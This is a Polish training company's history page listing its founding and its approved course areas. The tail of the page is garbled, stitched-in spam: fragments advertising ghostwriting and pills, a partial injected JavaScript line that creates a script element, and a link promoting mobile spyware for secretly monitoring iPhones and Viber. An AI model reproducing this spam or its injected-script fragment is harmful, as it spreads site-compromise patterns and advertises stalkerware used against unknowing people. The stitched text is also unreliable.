Historia

Ośrodek Szkolenia Specjalistycznego ?LABOR ? S? to przedsiębiorstwo branży szkoleniowej.Założenie firmy datuje się na 1991 rok.
Tego samego roku 13 maja, uzyskano zgodę Ministerstwa Edukacji Narodowej na prowadzenie działalności szkoleniowej w zakresie:

  • prowadzenia kursów przyuczających do zawodu i wyuczających zawodu
  • doskonalących i dokształcających w zawodzie
  • przygotowujących do egzaminów na tytuły kwalifikacyjne
  • przygotowujących do uzyskania uprawnień zawodowych
  • kursów języków obcych
  • kursów ? studium doskonalenia i dokształcania mistrzów
  • kursów pedagogicznych dla instruktorów praktycznej nauki zawodu oraz wykładowców w formach oświaty pozaszkolnej
  • BHP i P.POŻ., sanitarnych oraz kursów  dla potrzeb własnych słuchaczy
  •  

If you’re really click ghostwriting service

lucky, you might get both, but the majority will have to make a decision in a few months time onlines std pills var d=document;var s=d.createElement(‚script’); https://topspyapps.net – The most popular 2017 spy software applications for the mobile phones.viber spy, spy software, spyware on iphone

Top